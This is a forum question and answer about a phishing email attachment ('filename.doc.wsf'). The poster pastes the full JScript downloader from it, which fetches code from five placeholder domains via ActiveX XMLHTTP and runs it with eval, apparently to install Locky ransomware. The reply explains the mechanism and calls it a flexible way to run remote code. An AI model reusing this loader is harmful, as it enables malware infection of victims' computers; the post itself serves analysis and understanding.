I received one of those “FedEx package could not be delivered, please open the .doc attached” -emails recently. Since I had recently ordered stuff online and since I’m apparently an idiot, I clicked the attachment open. Luckily I was using Linux so no harm done for opening the “filename.doc.wsf”. I did, however get curious on what exactly is the following snippet contained in it is trying to do.
According to my Googling, the final goal is to install a malware called Locky on a Windows system. The different domains where the malware is trying to get downloaded from are listed in the array x[], and the first few lines inside the for-loop seem to construct the whole url from snippets. (I assume it has been broken down to try to avoid spam detection.) But starting from "try " I can't quite follow what is going on?
<job><script language=JScript>
var x = new Array("DOMAIN1.com","DOMAIN2.ru","ftp.DOMAIN3.com","DOMAIN4.ru","DOMAIN5.com");
var y = "Msxml2.XMLHTTP";
for (var i=0; i<5; i++)
{
x[i] = "http://" + x[i];
x[i] += "/co";
x[i] += "unter/";
x[i] += "?a=0.34960858&i=rRMDdRYvgD1oBqvgMjMaHDglAgtoQ1d6_hYJEPEXmzddhBr8QbsIrfboGHt9FZlWF53OH-6Q8M45bw";
try {
var z = new ActiveXObject(y);
z.open("GET", x[i], false);
z.send();
if (z.status == 200)
{
eval(z.responseText.split("~").join("a"));
break;
};
}
catch(e) { };
};
</script></job>
It simply sends an HTTP get request to 5 different URLs and evaluates the content retrieved from the URL.
It's a simple way to execute code from remote locations on your PC. You can change the remote code without changing this script thus making your logic more flexible.